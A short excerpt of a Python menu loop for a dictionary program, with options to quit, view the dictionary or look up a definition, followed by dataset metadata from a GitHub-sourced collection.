if answer == "q":
break
elif answer == "v":
displayDictionary()
elif answer == "d":
getDefinition()
else:
print("Invlaid input")
print("Goodbye") | [
"noreply@github.com"
] | noreply@github.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.